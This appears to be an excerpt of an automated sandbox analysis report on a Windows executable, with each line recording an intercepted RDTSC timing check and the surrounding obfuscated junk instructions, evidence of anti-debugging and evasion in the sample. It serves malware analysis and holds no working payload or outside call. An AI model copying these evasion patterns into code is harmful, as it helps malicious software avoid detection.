                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C6EA4C second address: C6EA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C6EA50 second address: C6EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C6EA56 second address: C6EA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C6EA5B second address: C6EA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7DF30 second address: C7DF49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7DF49 second address: C7DF71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F8AF15A7F56h 0x00000009 jmp 00007F8AF15A7F61h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F8AF15A7F6Ch 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7DF71 second address: C7DF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7C2A4 second address: C7C2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8AF15A7F56h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 js 00007F8AF15A7F58h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7C2C0 second address: C7C2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF42Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C70EE6 second address: C70EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C70EEA second address: C70F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF42Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C70F00 second address: C70F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C70F04 second address: C70F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7D099 second address: C7D0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7D703 second address: C7D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7DDD9 second address: C7DDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C7DDE3 second address: C7DE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8AF10CF426h 0x0000000a popad 0x0000000b jmp 00007F8AF10CF42Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C834EA second address: C834F4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4C0D9 second address: C4C0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007F8AF10CF426h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4C0E6 second address: C4C0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F8AF15A7F56h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4C0F6 second address: C4C0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4A56E second address: C4A572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4A572 second address: C4A586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F8AF10CF426h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4A586 second address: C4A5A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F8AF15A7F5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F8AF15A7F56h 0x00000013 jl 00007F8AF15A7F56h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4A5A8 second address: C4A5FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F8AF10CF437h 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F8AF10CF42Ch 0x0000001f jmp 00007F8AF10CF42Fh 0x00000024 push edx 0x00000025 pop edx 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b jnp 00007F8AF10CF426h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4A5FC second address: C4A600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4A600 second address: C4A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C89E53 second address: C89E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8A64D second address: C8A659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8AF10CF426h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8BEBD second address: C8BEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8BEC1 second address: C8BECB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8BECB second address: C8BEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8AF15A7F63h 0x0000000d jns 00007F8AF15A7F56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8BEEC second address: C8BEF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8BEF0 second address: C8BF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8BF09 second address: C8BF35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8AF10CF42Fh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8AF10CF42Ah 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jng 00007F8AF10CF430h 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8C6C0 second address: C8C6CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8C6CA second address: C8C6D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8C9E5 second address: C8C9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8C9EB second address: C8C9F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8CD2C second address: C8CD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8D42B second address: C8D43D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8D43D second address: C8D443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8D7A0 second address: C8D7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8D7A5 second address: C8D7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F60h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jp 00007F8AF15A7F5Ch 0x00000015 mov esi, dword ptr [ebp+122D3A63h] 0x0000001b sub dword ptr [ebp+122D3494h], ebx 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F8AF15A7F5Dh 0x00000027 push eax 0x00000028 pushad 0x00000029 jne 00007F8AF15A7F5Ch 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8F69C second address: C8F6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9015D second address: C90166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8FF4A second address: C8FF50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C90166 second address: C901E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d jmp 00007F8AF15A7F5Ch 0x00000012 pop ecx 0x00000013 nop 0x00000014 mov edi, 4D797500h 0x00000019 adc di, 57C9h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F8AF15A7F58h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov esi, dword ptr [ebp+122D3B13h] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F8AF15A7F58h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c mov esi, edx 0x0000005e sub dword ptr [ebp+122D1BDCh], eax 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 je 00007F8AF15A7F58h 0x0000006d push eax 0x0000006e pop eax 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C901E7 second address: C901F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C901F5 second address: C901F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C90CD2 second address: C90CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C90CD8 second address: C90CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pushad 0x00000008 jbe 00007F8AF15A7F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C91807 second address: C91812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8AF10CF426h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C91812 second address: C91817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C91817 second address: C9181D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9154F second address: C91554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C91554 second address: C9155E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9155E second address: C9156E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007F8AF15A7F5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C921FF second address: C9225C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F8AF10CF435h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F8AF10CF428h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+1247B8FFh], ebx 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D28FAh], edi 0x00000036 push 00000000h 0x00000038 add dword ptr [ebp+12450624h], ecx 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9225C second address: C92265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C92265 second address: C92269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C980A3 second address: C980B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8AF15A7F56h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C980B2 second address: C980B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9347B second address: C93480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C980B6 second address: C980BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C980BA second address: C980C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C986B6 second address: C986BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C986BA second address: C986C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C986C7 second address: C986D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F8AF10CF426h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C986D5 second address: C986D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C986D9 second address: C98756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F8AF10CF428h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1C46h], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F8AF10CF428h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 clc 0x00000045 push 00000000h 0x00000047 jo 00007F8AF10CF428h 0x0000004d mov bl, 17h 0x0000004f js 00007F8AF10CF42Ch 0x00000055 mov dword ptr [ebp+122D1C9Eh], eax 0x0000005b xchg eax, esi 0x0000005c jmp 00007F8AF10CF435h 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C99703 second address: C99743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8AF15A7F68h 0x00000010 pushad 0x00000011 jnp 00007F8AF15A7F56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C99743 second address: C997AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8AF10CF428h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 jne 00007F8AF10CF42Fh 0x00000027 movsx edi, dx 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D3B5Bh] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F8AF10CF428h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jne 00007F8AF10CF426h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9884C second address: C98851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C98851 second address: C98857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C98857 second address: C9886E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F8AF15A7F68h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F8AF15A7F56h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9886E second address: C98872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9B85F second address: C9B86D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F8AF15A7F56h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9B86D second address: C9B894 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F8AF10CF437h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9B894 second address: C9B89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9C7D6 second address: C9C7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9BA43 second address: C9BA4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9A888 second address: C9A88E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
